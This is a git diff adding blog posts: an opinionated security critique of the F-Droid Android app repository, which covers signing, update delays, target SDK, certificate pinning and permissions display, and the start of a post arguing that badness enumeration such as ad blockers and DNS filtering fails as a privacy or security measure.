*This is not an in-depth security review, nor is it exhaustive.*
|
||||
|
||||
## 1. The trusted party problem
|
||||
To understand why this is a problem, you'll have to understand a bit about F-Droid's architecture, the things it does very differently from other app repositories, and the [Android platform security model](https://arxiv.org/pdf/1904.05572.pdf) (some of the issues listed in this article are somewhat out of the scope of the OS security model, but the majority is).
|
||||
|
||||
Unlike other repositories, F-Droid signs all the apps in the main repository with **its own signing keys** (unique per app) at the exception of the very few [reproducible builds](https://f-droid.org/en/docs/Reproducible_Builds/). A signature is a mathematical scheme that guarantees the authenticity of the applications you download. Upon the installation of an app, Android pins the signature across the entire OS (including user profiles): that's what we call a *trust-on-first-use* model since all subsequent updates of the app must have the corresponding signature to be installed.
|
||||
|
||||
Normally, the developer is supposed to sign their own app prior to its upload on a distribution channel, whether that is a website or a traditional repository (or both). You don't have to trust the source (usually recommended by the developer) except for the first installation: future updates will have their authenticity cryptographically guaranteed. The issue with F-Droid is that all apps are signed by the same party (F-Droid) which is also not the developer. You're now adding another party you'll have to trust since **you still have to trust the developer** anyway, which isn't ideal: **the fewer parties, the better**.
|
||||
|
||||
On the other hand, Play Store now manages the app signing keys too, as [Play App Signing](https://developer.android.com/studio/publish/app-signing#app-signing-google-play) is required for app bundles which are required for new apps since August 2021. These signing keys can be uploaded or automatically generated, and are securely stored by [Google Cloud Key Management Service](https://services.google.com/fh/files/misc/security_whitepapers_march2018.pdf). It should be noted that the developer still has to sign the app with **an upload key** so that Google can verify its authenticity before signing it with the app signing key. For apps created before August 2021 that may have [not opted in Play App Signing](https://developer.android.com/studio/publish/app-signing#opt-out) yet, the developer still manages the private key and is responsible for its security, as a compromised private key can allow a third party to sign and distribute malicious code.
|
||||
|
||||
F-Droid requires that the source code of the app is exempt from any proprietary library or ad service, according to their [inclusion policy](https://f-droid.org/en/docs/Inclusion_Policy/). Usually, that means that some developers will have to maintain a slightly different version of their codebase that should comply with F-Droid's requirements. Besides, their "quality control" offers **close to no guarantees** as having access to the source code doesn't mean it can be easily proofread. Saying Play Store is filled with malicious apps is beyond the point: the **false sense of security** is a real issue. Users should not think of the F-Droid main repository as free of malicious apps, yet unfortunately many are inclined to believe this.
|
||||
|
||||
> But... can't I just trust F-Droid and be done with it?
|
||||
|
||||
[You don't have to take my word for it](https://forum.f-droid.org/t/is-it-as-safe-as-it-is-from-fdroid-official-repo/15956/12): they openly admit themselves it's a [very basic process](https://forum.f-droid.org/t/is-it-as-safe-as-it-is-from-fdroid-official-repo/15956/2) relying on badness enumeration (this doesn't work by the way) which consists in a few scripts scanning the code for proprietary blobs and known trackers. You are therefore not exempted from trusting upstream developers and it goes for any repository.
|
||||
|
||||
*A tempting idea would be to compare F-Droid to the desktop Linux model where users trust their distribution maintainers out-of-the-box (this can be sane if you're already trusting the OS anyway), but the desktop platform is intrinsically chaotic and heterogeneous for better and for worse. It really shouldn't be compared to the Android platform in any way.*
|
||||
|
||||
While we've seen that F-Droid controls the signing servers (much like Play App Signing), F-Droid also fully controls the build servers that run the disposable VMs used for building apps. And [as of July 2022](https://gitlab.com/groups/fdroid/-/milestones/5#tab-issues), their guest VM image officially runs a version of Debian which reached EOL. Undoubtedly, this raises questions about their whole infrastructure security.
|
||||
|
||||
> How can you be sure that the app repository can be held to account for the code it delivers?
|
||||
|
||||
F-Droid's answer, interesting yet largely unused, is [build reproducibility](https://f-droid.org/en/docs/Reproducible_Builds/). While deterministic builds are a neat idea in theory, it requires the developer to make their toolchain match with what F-Droid provides. It's additional work on both ends sometimes resulting in [apps severely lagging behind in updates](https://code.briarproject.org/briar/briar/-/issues/1612), so reproducible builds are not as common as we would have wanted. It should be noted that reproducible builds in the main repository can be exclusively developer-signed.
|
||||
|
||||
Google's approach is [code transparency for app bundles](https://developer.android.com/guide/app-bundle/code-transparency), which is a simple idea addressing some of the concerns with Play App Signing. A JSON Web Token (JWT) signed by a key private to the developer is included in the app bundle before its upload to Play Store. This token contains a list of DEX files and native `.so` libraries and their hashes, allowing end-users to verify that the running code was built and signed by the app developer. Code transparency has known limitations, however: not all resources can be verified, and this verification can only be done manually since it's not part of the Android platform itself (so requiring a code transparency file cannot be enforced by the OS right now). Despite its incompleteness, code transparency is still helpful, easy to implement, and thus something we should see more often as time goes by.
|
||||
|
||||
> What about other app repositories such as Amazon?
|
||||
|
||||
[To my current knowledge](https://developer.amazon.com/docs/app-submission/understanding-submission.html#code_wrapper), the Amazon Appstore has always been wrapping APKs with their own code (including their own trackers), and this means they were effectively resigning submitted APKs.
|
||||
|
||||
If you understood correctly the information above, Google can't do this for apps that haven't opted in Play App Signing. As for apps concerned by Play App Signing, while Google could technically introduce their own code like Amazon, they wouldn't do that without telling about it since this will be easily noticeable by the developer and more globally researchers. They have other means on the Android app development platform to do so. Believing they won't do that based on this principle is not a strong guarantee, however: hence the above paragraph about code transparency for app bundles.
|
||||
|
||||
Huawei AppGallery seems to have a [similar approach](https://developer.huawei.com/consumer/en/doc/distribution/app/20210812) to Google, where submitted apps could be developer-signed, but newer apps will be resigned by Huawei.
|
||||
|
||||
## 2. Slow and irregular updates
|
||||
Since you're adding one more party to the mix, that party is now responsible for delivering proper builds of the app: it's a common thing among traditional Linux distributions and their packaging system. They have to catch up with *upstream* on a regular basis, but very few do it well (Arch Linux comes to my mind). Others, like Debian, prefer making extensive *downstream* changes and delivering security fixes for a subset of vulnerabilities assigned to a CVE (yeah, it's as bad as it sounds, but that's another topic).
|
||||
|
||||
Not only does F-Droid require specific changes for the app to comply with its inclusion policy, which often leads to more maintenance work, it also has a rather strange way of triggering new builds. Part of its build process seems to be [automated](https://f-droid.org/en/docs/FAQ_-_App_Developers/), which is the least you could expect. Now here's the thing: app signing keys are on an **air-gapped server** (meaning it's disconnected from any network, at least that's what they claim: see [their recommendations](https://f-droid.org/docs/Building_a_Signing_Server/) for reference), which forces an irregular update cycle where a human has to manually trigger the signing process. It is far from an ideal situation, and you may argue it's the least to be expected since by entrusting all the signing keys to one party, you could also introduce a single point of failure. Should their system be compromised (whether from the inside or the outside), this could lead to serious security issues affecting plenty of users.
|
||||
|
||||
*This is one of the main reasons why Signal refused to support the inclusion of a third-party build in the F-Droid official repository. While [this GitHub issue](https://github.com/signalapp/Signal-Android/issues/127) is quite old, many points still hold true today.*
|
||||
|
||||
Considering all this, and the fact that their build process is often broken using outdated tools, you have to expect **far slower updates** compared to a traditional distribution system. Slow updates mean that you will be exposed to security vulnerabilities more often than you should've been. It would be unwise to have a full browser updated through the F-Droid official repository, for instance. F-Droid third-party repositories somewhat mitigate the issue of slow updates since they can be managed directly by the developer. It isn't ideal either as you will see below.
|
||||
|
||||
## 3. Low target API level (SDK) for client & apps
|
||||
SDK stands for *Software Development Kit* and is the collection of software to build apps for a given platform. On Android, a higher SDK level means you'll be able to make use of modern API levels of which each iteration brings **security and privacy improvements**. For instance, API level 31 makes use of all these improvements on Android 12.
|
||||
|
||||
As you may already know, Android has a strong sandboxing model where each application is sandboxed. You could say that an app compiled with the highest API level benefits from all the latest improvements brought to the app sandbox; as opposed to outdated apps compiled with older API levels, which have a **weaker sandbox**.
|
||||
|
||||
```
|
||||
# b/35917228 - /proc/misc access
|
||||
# This will go away in a future Android release
|
||||
allow untrusted_app_25 proc_misc:file r_file_perms;
|
||||
|
||||
# Access to /proc/tty/drivers, to allow apps to determine if they
|
||||
# are running in an emulated environment.
|
||||
# b/33214085 b/33814662 b/33791054 b/33211769
|
||||
# https://github.com/strazzere/anti-emulator/blob/master/AntiEmulator/src/diff/strazzere/anti/emulator/FindEmulator.java
|
||||
# This will go away in a future Android release
|
||||
allow untrusted_app_25 proc_tty_drivers:file r_file_perms;
|
||||
```
|
||||
|
||||
This is a mere sample of the [SELinux exceptions](https://android.googlesource.com/platform/system/sepolicy/+/refs/tags/android-12.0.0_r21/private) that have to be made on older API levels so that you can understand why it matters.
|
||||
|
||||
It turns out the official F-Droid client doesn't care much about this since it lags behind quite a bit, **[targeting the API level 25](https://gitlab.com/fdroid/fdroidclient/-/blob/2a8b16683a2dbee16d624a58e7dd3ea1da772fbd/app/build.gradle#L33)** (Android 7.1) of which some SELinux exceptions were shown above. As a workaround, some users recommended third-party clients such as [Foxy Droid](https://f-droid.org/en/packages/nya.kitsunyan.foxydroid/) or [Aurora Droid](https://f-droid.org/en/packages/com.aurora.adroid/). While these clients might be technically better, they're poorly maintained for some, and they also introduce yet another party to the mix. [Droid-ify](https://github.com/Iamlooker/Droid-ify) (recently rebranded to Neo-Store) seems to be a better option than the official client in most aspects.
|
||||
|
||||
Furthermore, F-Droid **doesn't enforce a minimum target SDK** for the official repository. Play Store [does that quite aggressively](https://developer.android.com/google/play/requirements/target-sdk) for new apps and app updates:
|
||||
|
||||
- Since August 2021, Play Store requires new apps to target at least API level 30.
|
||||
- Since November 2021, existing apps must at least target API level 30 for updates to be submitted.
|
||||
|
||||
While it may seem bothersome, it's a necessity to keep the **app ecosystem modern and healthy**. Here, F-Droid sends the wrong message to developers (and even users) because they should care about it, and this is why many of us think it may be even harmful to the FOSS ecosystem. Backward compatibility is often the enemy of security, and while there's a middle-ground for convenience and obsolescence, it shouldn't be exaggerated. As a result of this philosophy, the main repository of F-Droid is filled with obsolete apps from another era, just for these apps to be able to run on the more than ten years old Android 4.0 Ice Cream Sandwich. Let's not make the same mistake as the desktop platforms: instead, complain to your vendors for selling devices with no decent OS/firmware support.
|
||||
|
||||
There is little practical reason for developers not to increase the target SDK version (`targetSdkVersion`) along with each Android release. This attribute matches the version of the platform an app is targeting, and allows access to modern improvements, rules and features on a modern OS. The app can still ensure backwards compatibility in such a way that it can run on older platforms: the `minSdkVersion` attribute informs the system about the minimum API level required for the application to run. Setting it too low isn't practical though, because this requires having a lot of fallback code (most of it is handled by common libraries) and separate code paths.
|
||||
|
||||
At the time of writing:
|
||||
- Android 9 is the oldest Android version that is [getting security updates](https://endoflife.date/android).
|
||||
- [~80% of the Android devices](https://developer.android.com/about/dashboards) used in the world are **at least** running 8.0 Oreo.
|
||||
|
||||
*Overall statistics do not reflect real-world usage of a given app (people using old devices are not necessarily using your app). If anything, it should be viewed as an underestimation.*
|
||||
|
||||
## 4. General lack of good practices
|
||||
The F-Droid client allows multiple repositories to coexist within the same app. Many of the issues highlighted above were focused on the main official repository which most of the F-Droid users will use anyway. However, having **other repositories in a single app also violates the security model of Android** which was not designed for this at all. The OS expects you to trust **an app repository as a single source** of apps, yet F-Droid isn't that by design as it mixes several repositories in one single app. This is important because the OS management APIs and features (such as [UserManager](https://developer.android.com/reference/android/os/UserManager) which can be used to prevent a user from installing third-party apps) are not meant for this and see F-Droid as a single source, so you're trusting the app client to not mess up far more than you should, especially when the **privileged extension** comes into the picture.
|
||||
|
||||
There is indeed a serious security issue with the OS first-party source feature being misused, as the privileged extension makes use of the `INSTALL_PACKAGES` [API](https://developer.android.com/reference/android/Manifest.permission#INSTALL_PACKAGES) in an insecure manner (i.e. not implementing it with the appropriate security checks). The privileged extension accepts any request from F-Droid, which again suffers from various bugs and security issues and allows user-defined repositories by design. A lot can go wrong, and bypassing security checks for powerful APIs should definitely not be taken lightly.
|
||||
|
||||
On that note, it is also worth noting the repository metadata format isn't properly signed by lacking whole-file signing and key rotation. [Their index v1](https://f-droid.org/2021/02/05/apis-for-all-the-things.html#the-repo-index) format [uses JAR signing](https://gitlab.com/fdroid/fdroidserver/-/blob/3182b77d180b2313f4fdb101af96c035380abfd7/fdroidserver/signindex.py) with `jarsigner`, which has serious security flaws. It seems that [work is in progress on a v2 format](https://gitlab.com/fdroid/fdroidserver/-/commit/3182b77d180b2313f4fdb101af96c035380abfd7) with support for `apksigner`, although the final implementation remains to be seen. This just seems to be an over-engineered and flawed approach since better suited tools such as `signify` could be used to sign the metadata JSON.
|
||||
|
||||
As a matter of fact, the [new unattended update API](https://developer.android.com/reference/android/Manifest.permission#UPDATE_PACKAGES_WITHOUT_USER_ACTION) added in API level 31 (Android 12) that allows seamless app updates for app repositories without [privileged access](https://f-droid.org/en/packages/org.fdroid.fdroid.privileged/) to the system (such an approach is not compatible with the security model) won't work with F-Droid "as is". It should be mentioned that the aforementioned third-party client [Neo-Store](https://github.com/Iamlooker/Droid-ify/issues/20) supports this API, although the underlying issues about the F-Droid infrastructure largely remain. Indeed, this secure API allowing for unprivileged unattended updates not only requires for the app repository client to target API level 31, but the apps to be updated also have to at least target API level 29.
|
||||
|
||||
Their client also lacks **TLS certificate pinning**, unlike Play Store which improves security for all connections to Google (they generally use a limited set of root CAs including [their own](https://pki.goog/)). Certificate pinning is a way for apps to increase the security of their connection to services [by providing a set of public key hashes](https://developer.android.com/training/articles/security-config#CertificatePinning) of known-good certificates for these services instead of trusting pre-installed CAs. This can avoid some cases where an interception (*man-in-the-middle* attack) could be possible and lead to various security issues considering you're trusting the app to deliver you other apps.
|
||||
|
||||
It is an important security feature that is also straightforward to implement using the [declarative network security configuration](https://developer.android.com/training/articles/security-config) available since Android 7.0 (API level 24). See how GrapheneOS pins both root and CA certificates in their [app repository client](https://github.com/GrapheneOS/Apps):
|
||||
|
||||
```xml
|
||||
<!-- res/xml/network_security_config.xml -->
|
||||
<network-security-config>
|
||||
<base-config cleartextTrafficPermitted="false"/>
|
||||
<domain-config>
|
||||
<domain includeSubdomains="true">apps.grapheneos.org</domain>
|
||||
<pin-set>
|
||||
<!-- ISRG Root X1 -->
|
||||
<pin digest="SHA-256">C5+lpZ7tcVwmwQIMcRtPbsQtWLABXhQzejna0wHFr8M=</pin>
|
||||
<!-- ISRG Root X2 -->
|
||||
<pin digest="SHA-256">diGVwiVYbubAI3RW4hB9xU8e/CH2GnkuvVFZE8zmgzI=</pin>
|
||||
<!-- Let's Encrypt R3 -->
|
||||
<pin digest="SHA-256">jQJTbIh0grw0/1TkHSumWb+Fs0Ggogr621gT3PvPKG0=</pin>
|
||||
<!-- Let's Encrypt E1 -->
|
||||
<pin digest="SHA-256">J2/oqMTsdhFWW/n85tys6b4yDBtb6idZayIEBx7QTxA=</pin>
|
||||
...
|
||||
</pin-set>
|
||||
</domain-config>
|
||||
</network-security-config>
|
||||
```
|
||||
|
||||
To be fair, they've thought several times about adding certificate pinning to their client [at least for the default repositories](https://gitlab.com/fdroid/fdroidclient/-/issues/105). [Relics of preliminary work](https://gitlab.com/fdroid/fdroidclient/-/blob/1.14-alpha4/app/src/main/java/org/fdroid/fdroid/FDroidCertPins.java) can even be found in their current codebase, but it's unfortunate that they haven't been able to find [any working implementation](https://github.com/f-droid/fdroidclient/commit/7f78b46664981b9b73cadbfdda6391f6fe939c77) so far. Given the overly complex nature of F-Droid, that's largely understandable.
|
||||
|
||||
F-Droid also has a problem regarding the adoption of **[new signature schemes](https://source.android.com/security/apksigning)** as they [held out on the v1 signature scheme](https://forum.f-droid.org/t/why-f-droid-is-still-using-apk-signature-scheme-v1/10602) (which was [horrible](https://www.xda-developers.com/janus-vulnerability-android-apps/) and deprecated since 2017) until they were forced by Android 11 requirements to support the newer v2/v3 schemes (v2 was introduced in Android 7.0). Quite frankly, this is straight-up bad, and **signing APKs with GPG** is no better considering [how bad PGP and its reference implementation GPG are](https://latacora.micro.blog/2019/07/16/the-pgp-problem.html) (even Debian [is trying to move away from it](https://wiki.debian.org/Teams/Apt/Spec/AptSign)). Ideally, F-Droid should fully move on to newer signature schemes, and should completely phase out the legacy signature schemes which are still being used for some apps and metadata.
|
||||
|
||||
## 5. Confusing UX
|
||||
It is worth mentioning that their website has (for some reason) always been hosting an [outdated APK of F-Droid](https://forum.f-droid.org/t/why-does-the-f-droid-website-nearly-always-host-an-outdated-f-droid-apk/6234), and this is still the case today, leading to many users wondering why they can't install F-Droid on their secondary user profile (due to the downgrade prevention enforced by Android). "Stability" seems to be the main reason mentioned on their part, which doesn't make sense: either your version isn't ready to be published in a stable channel, or it is and new users should be able to access it easily.
|
||||
|
||||
F-Droid should enforce the approach of prefixing the package name of their alternate builds with `org.f-droid` for instance (or add a `.fdroid` suffix as some already have). Building and signing while **reusing the package name** ([application ID](https://developer.android.com/studio/build/configure-app-module)) is bad practice as it causes **signature verification errors** when some users try to update/install these apps from other sources, even directly from the developer. That is again due to the security model of Android which enforces a signature check when installing app updates (or installing them again in a secondary user profile). Note that this is going to be an issue with Play App Signing as well, and developers are encouraged to follow this approach should they intend to distribute their apps through different distribution channels.
|
||||
|
||||
This results in a confusing user experience where it's hard to keep track of who signs each app, and from which repository the app should be downloaded or updated.
|
||||
|
||||
## 6. Misleading permissions approach
|
||||
F-Droid shows a list of the [low-level permissions](https://developer.android.com/reference/android/Manifest.permission) for each app: these low-level permissions are usually grouped in the standard high-level permissions (Location, Microphone, Camera, etc.) and special toggles (nearby Wi-Fi networks, Bluetooth devices, etc.) that are explicitly based on a type of sensitive data. While showing a list of low-level permissions could be useful information for a developer, it's often a **misleading** and inaccurate approach for the end-user. Since Android 6, apps have to [request the standard permissions at runtime](https://developer.android.com/guide/topics/permissions/overview#runtime) and do not get them simply by being installed, so showing all the "under the hood" permissions without proper context is not useful and makes the permission model unnecessarily confusing.
|
||||
|
||||
F-Droid claims that these low-level permissions are relevant because they support Android 5.1+, meaning they support very outdated versions of Android where apps could have [install-time permissions](https://source.android.com/devices/tech/config/runtime_perms). Anyway, if a technical user wants to see all the manifest permissions for some reason, then they can access the app manifest pretty easily (in fact, exposing the raw manifest would be less misleading). But this is already beyond the scope of this article because anyone who cares about privacy and security wouldn't run a 8 years old version of Android that has not received security updates for years.
|
||||
|
||||
*To clear up confusion: even apps targeting an API level below 23 (Android 5.1 or older) do not have permissions granted at install time on modern Android, which instead displays a legacy permission grant dialog. Whether or not permissions are granted at install time does not just depend on the app's `targetSdkVersion`. And even if this were the case, the OS package installer on modern Android would've been designed to show the requested permissions for those legacy apps.*
|
||||
|
||||
For example, the low-level permission `RECEIVE_BOOT_COMPLETED` is referred to in F-Droid as the *run at startup* description, when in fact this permission is not needed to start at boot and just refers to a specific time broadcasted by the system once it finishes booting, and is not about background usage (though power usage may be a valid concern). To be fair, these short summaries used to be provided by the Android documentation years ago, but the permission model has drastically evolved since then and most of them aren't accurate anymore.
|
||||
|
||||
> *Allows the app to have itself started as soon as the system has finished booting. This can make it take longer to start the phone and allow the app to slow down the overall phone by always running.*
|
||||
|
||||
In modern Android, the background restriction toggle is what really provides the ability for apps to run in the background. Some low-level permissions don't even have a security/privacy impact and shouldn't be misinterpreted as having one. Anyhow, you can be sure that each dangerous low-level permission has a **high-level representation** that is **disabled by default** and needs to be **granted dynamically** to the app (by a toggle or explicit user consent in general).
|
||||
|
||||
Another example to illustrate the shortcomings of this approach would be the `QUERY_ALL_PACKAGES` low-level permission, which is referred to as the *query all packages* permission that "allows an app to see all installed packages". While this is somewhat correct, this can also be misleading: apps do not need `QUERY_ALL_PACKAGES` to list other apps within the same user profile. Even without this permission, some apps are visible automatically (visibility is restricted by default [since Android 11](https://developer.android.com/training/package-visibility)). If an app needs more visibility, it will declare a `<queries>` element in its manifest file: in other words, `QUERY_ALL_PACKAGES` is only one way to achieve visibility. Again, this goes to show low-level manifest permissions are not intended to be interpreted as high-level permissions the user should fully comprehend.
|
||||
|
||||
Play Store for instance conveys the permissions in a way less misleading way: the main low-level permissions are first grouped in their high-level user-facing toggles, and the rest is shown under "Other". This permission list can only be accessed by taping "About this app" then "App permissions - See more" at the bottom of the page. Play Store will tell the app may request access to the following permissions: this kind of wording is more important than it seems. *Update: since July 2022, Play Store doesn't offer a way to display low-level permissions anymore.*
|
||||
|
||||
Moreover, [Play Store restricts the use of highly invasive permissions](https://support.google.com/googleplay/android-developer/answer/9888170) such as `MANAGE_EXTERNAL_STORAGE` which allows apps to opt out of scoped storage if they can't work with [more privacy friendly approaches](https://developer.android.com/guide/topics/providers/document-provider) (like a file explorer). Apps that can't justify their use of this permission (which again has to be granted dynamically) may be removed from Play Store. This is where an app repository can actually be useful in their review process to protect end-users from installing poorly made apps that might compromise their privacy. Not that it matters much if these apps target very old API levels that are inclined to require invasive permissions in the first place...
|
||||
|
||||
## Conclusion: what should you do?
|
||||
So far, you have been presented with referenced facts that are easily verifiable. In the next part, I'll allow myself to express my own thoughts and opinions. You're free to disagree with them, but don't let that overshadow the rest.
|
||||
|
||||
While some improvements could easily be made, I don't think F-Droid is in an ideal situation to solve all of these issues because some of them are **inherent flaws** in their architecture. I'd also argue that their core philosophy is not aligned with some security principles expressed in this article. In any case, I can only wish for them to improve since they're one of the most popular alternatives to commercial app repositories, and are therefore trusted by a large userbase.
|
||||
|
||||
F-Droid is often seen as the only way to get and support open-source apps: that is not the case. Sure, F-Droid could help you in finding FOSS apps that you wouldn't otherwise have known existed. Many developers also publish their FOSS apps on the **Play Store** or their website directly. Most of the time, releases are available on **GitHub**, which is great since each GitHub releases page has an Atom feed. If downloading APKs from regular websites, you can use `apksigner` to validate the authenticity by comparing the certificate fingerprint against the fingerprint from another source (it wouldn't matter otherwise).
|
||||
|
||||
This is how you may proceed to get the app certificate:
|
||||
|
||||
```
|
||||
apksigner verify --print-certs --verbose myCoolApp.apk
|
||||
```
|
||||
|
||||
Also, as written above: the OS pins the app signature (for all profiles) upon installation, and enforces signature check for app updates. In practice, this means the source doesn't matter as much after the initial installation.
|
||||
|
||||
For most people, I'd recommend just **sticking with Play Store**. Play Store isn't quite flawless, but emphasises the adoption of modern security standards which in turn encourages better privacy practices; as strange as it may sound, Google is not always doing bad things in that regard.
|
||||
|
||||
*Note: this article obviously can't address all the flaws related to Play Store itself. Again, the main topic of this article is about F-Droid and should not be seen as an exhaustive comparison between different app repositories.*
|
||||
|
||||
> Should I really care?
|
||||
|
||||
**It's up to your threat model**, and of course your personal preferences. Most likely, your phone won't turn into a nuclear weapon if you install F-Droid on it - and this is far from the point that this article is trying to make. Still, I believe the information presented will be valuable for anyone who values a **practical approach to privacy** (rather than an ideological one). Such an approach is partially described below.
|
||||
|
||||
> But there is more malware in Play Store! How can you say that it's more secure?
|
||||
|
||||
As explained above, it doesn't matter as you shouldn't really rely on any quality control to be the sole guarantee that a software is free of malicious or exploitable code. Play Store and even the Apple App Store may have a considerable amount of malware because a full reverse-engineering of any uploaded app isn't feasible realistically. However, they fulfill their role quite well, and that is all that is expected of them.
|
||||
|
||||
> With Play App Signing being effectively enforced for new apps, isn't Play Store as "flawed" as F-Droid?
|
||||
|
||||
I've seen this comment repeatedly, and it would be dismissing all the other points made in this article. Also, I strongly suggest that you carefully read the sections related to Play App Signing, and preferably the official documentation on this matter. It's not a black and white question and there are many more nuances to it.
|
||||
|
||||
> Aren't open-source apps more secure? Doesn't it make F-Droid safer?
|
||||
|
||||
You can still find and get your open-source apps elsewhere. And no, open-source apps [aren't necessarily more private or secure](https://seirdy.one/2022/02/02/floss-security.html). Instead, you should rely on the strong security and privacy guarantees provided by a modern operating system with **a robust sandboxing/permission model**, namely modern Android, GrapheneOS and iOS. Pay close attention to the permissions you grant, and avoid legacy apps as they could require invasive permissions to run.
|
||||
|
||||
When it comes to *trackers* (this really comes up a lot), you shouldn't believe in the flawed idea that you can enumerate all of them. The *enumerating badness* approach is [known to be flawed in the security field](https://www.ranum.com/security/computer_security/editorials/dumb/), and the same applies to privacy. You shouldn't believe that a random script can detect every single line of code that can be used for data exfiltration. Data exfiltration can be properly prevented in the first place by the permission model, which again **denies access to sensitive data by default**: this is a simple, yet rigorous and effective approach.
|
||||
|
||||
No app should be unnecessarily entrusted with any kind of permission. It is only if you deem it necessary that you should allow access to a type of data, and this access should be as fine-grained as possible. That's the way the Android platform works (regular apps run in the explicit `untrusted_app` domain) and continues evolving. Contrary to some popular beliefs, usability and most productivity tasks can still be achieved in a secure and private way.
|
||||
|
||||
> Isn't Google evil? Isn't Play Store spyware?
|
||||
|
||||
Some people tend to exaggerate the importance of Google in their threat model, at the cost of pragmatism and security/privacy good practices. Play Store isn't spyware and can run unprivileged like it does on GrapheneOS (including with unattended updates support). On the vast majority of devices though, Google Play is a privileged app and a core part of the OS that provides low-level system modules. In that case, the trust issues involved with Play App Signing could be considered less important since Google Play is already trusted as a privileged component.
|
||||
|
||||
**Play Store evidently has some privacy issues** given it's a proprietary service which requires an account (this cannot be circumvented), and Google services have a history of nagging users to enable privacy-invasive features. Again, some of these privacy issues can be mitigated by setting up the [Play services compatibility layer from GrapheneOS](https://grapheneos.org/usage#sandboxed-google-play) which runs Play services and Play Store in the regular app sandbox (the `untrusted_app` domain). [ProtonAOSP also shares that feature](https://protonaosp.org/features#privacy-and-security). This solution could very well be ported to other Android-based operating systems. If you want to go further, consider using a properly configured account with the least amount of personally indentifiable information possible (note that the phone number requirement appears to be region-dependent).
|
||||
|
||||
If you don't have Play services installed, you can use a third-party Play Store client called **[Aurora Store](https://auroraoss.com/)**. Aurora Store has some issues of its own, and some of them overlap in fact with F-Droid. Aurora Store somehow still requires [the legacy storage permission](https://gitlab.com/AuroraOSS/AuroraStore/-/blob/26f5d4fd558263a89baee4c3cbe1d220913da104/app/src/main/AndroidManifest.xml#L28-32), has yet to [implement certificate pinning](https://gitlab.com/AuroraOSS/AuroraStore/-/issues/697), has been known to sometimes retrieve wrong versions of apps, and [distributed account tokens](https://gitlab.com/AuroraOSS/AuroraStore/-/issues/722) over [cleartext HTTP](https://gitlab.com/AuroraOSS/AuroraStore/-/issues/734) until fairly recently; not that it matters much since tokens were designed to be shared between users, which is already concerning. I'd recommend against using the shared "anonymous" accounts feature: you should make your own throwaway account with minimal information.
|
||||
|
||||
You should also keep an eye on the great work **GrapheneOS** does on [their future app repository](https://github.com/GrapheneOS/Apps). It will be a simple, secure, modern app repository for a curated list of high-quality apps, some of which will have their own builds (for instance, Signal still uses their [original 1024-bits RSA key](https://github.com/signalapp/Signal-Android/issues/9362) that has never been rotated since then). Inspired by this work, a GrapheneOS community member is developing a more generic app repository called [Accrescent](https://accrescent.app/). Hopefully, we'll see well-made alternatives like these flourish.
|
||||
|
||||
*Thanks to the GrapheneOS community for proofreading this article. Bear in mind that these are not official recommendations from the GrapheneOS project.*
|
||||
|
||||
*Post-publication note: it's unfortunate that the release of this article mostly triggered a negative response from the F-Droid team which prefers to dismiss this article on several occasions rather than bringing relevant counterpoints. Some of their core members are also involved in a harassment campaign towards projects and security researchers that do not share their views. While this article remains a technical one, there are definitely ethical concerns to take into consideration.*
|
7
content/posts/android/_index.md
Normal file
7
content/posts/android/_index.md
Normal file
|
@ -0,0 +1,7 @@
|
|||
---
|
||||
title: Android
|
||||
ShowReadingTime: false
|
||||
ShowWordCount: false
|
||||
---
|
||||
|
||||
A collection of posts about Android and related applications
|
51
content/posts/knowledge/Badness Enumeration.md
Normal file
51
content/posts/knowledge/Badness Enumeration.md
Normal file
|
@ -0,0 +1,51 @@
|
|||
---
|
||||
title: "Badness Enumeration"
|
||||
date: 2022-07-27
|
||||
tags: ['Knowledge base', 'Privacy', 'Security']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||
Badness enumeration is the concept of making a list of known bad actors and attempting to block them. While it seems intuitive at first glance, badness enumeration should not be relied on for privacy or security. In many cases, it actually does the exact opposite and directly harms the user. This post will attempt to explain why badness enumeration as a concept is flawed and give *some* examples of its failings in practice.
|
||||
|
||||
## The Obvious Problem
|
||||
|
||||
The obvious argument against badness enumeration is that there are so many threat actors out there, it is impossible to make a list to block all of them. Even when you make a magical list that somehow includes all of the threat actors that exist today, tomorrow a new threat actor will pop up and attack you anyways. Enumerating badness does not systematically solve the underlying problem. Instead, it is running away from the problem and hoping that a competent adversary will not come after you. Badness enumeration does not work, cannot work, has never worked, and will never work.
|
||||
|
||||
## Adblocking Extensions
|
||||
|
||||
On top of the [obvious problem](#the-obvious-problem) mentioned above, there are various technical reasons why advertisement/tracker blocking extensions cannot provide privacy. One of which is the fact that tracking can be done without any scripts at all. For example, a website only needs to know your session ID using a cookie and save all logs associated with that ID. It can then analyize when you visited the website, how long you visited the website for, which page on the website you spent the most time on, what you looked at, and so on. Another problem is that a website can just host its own tracking code or [proxy third party tracking code under its own domain](https://gist.github.com/paivaric/211ca15afd48c5686226f5f747539e8b). Just because your adblocker blocks connections to Google Analytics does not mean that you you are actually "safe" from Google Analytics at all. Even if you are successful in doing so, there is nothing stopping the website from sharing the analytics data it collected on its own with Google either.
|
||||
|
||||
"Okay, so adblockers are unreliable, but what is the harm?" you may ask.
|
||||
|
||||
The problem here is that adblockers (especially with Manifest v2) are highly privileged and have access to all of your data within the browser. All it takes is for the extension developer to turn malicious for your passwords, session ids, TOTP secrets, etc to get compromised. Even if you were to assume that the extension developer is trustworthy, one vulnerability within the extension could still be catastrophic. This is made worse by the fact that adblockers typically use third-party blocklists, extending trust to the blocklist maintainers to not exploit the extension should a vulnerability be found. The ["uBlock, I exfiltrate"](https://portswigger.net/research/ublock-i-exfiltrate-exploiting-ad-blockers-with-css) blog post describes in detail how a CSS injection vulnerability in uBlockOrigin lead to data exfiltration with one single bad filtering rule.
|
||||
|
||||
Overall, adblockers increase your attack surface for dubious privacy benefits. If you insist on getting an adblocker however, I highly recommend that you use purely declarative, permission less Manifest V3 ones like [uBlock Origin Lite](https://chrome.google.com/webstore/detail/ublock-origin-lite/ddkjiahejlhfcafbddmgiahcphecmpfh). While they do block fewer ads and trackers than their Manifest V2 counterparts and V3 extensions with "Read and change all your data on all websites", they pose much less of a threat to your privacy and security while still providing the convenience of blocking annoyances.
|
||||
|
||||
## DNS Filtering
|
||||
|
||||
DNS filtering solutions. while not having any negative impact on security, are trivially bypassable by just hosting the advertisement and trackers under the apex domain instead of a subdomain. For example, instead of hosting advertisement and trackers under ads.example.com, the webmaster can move them to be under example.com/ads and it would be impossible for DNS filters to block. Other bypasses include an application implementing its own DNS resolution instead of relying on the DNS servers set by the operating system, or connecting directly to certain IP addresses without any DNS resolution at all.
|
||||
|
||||
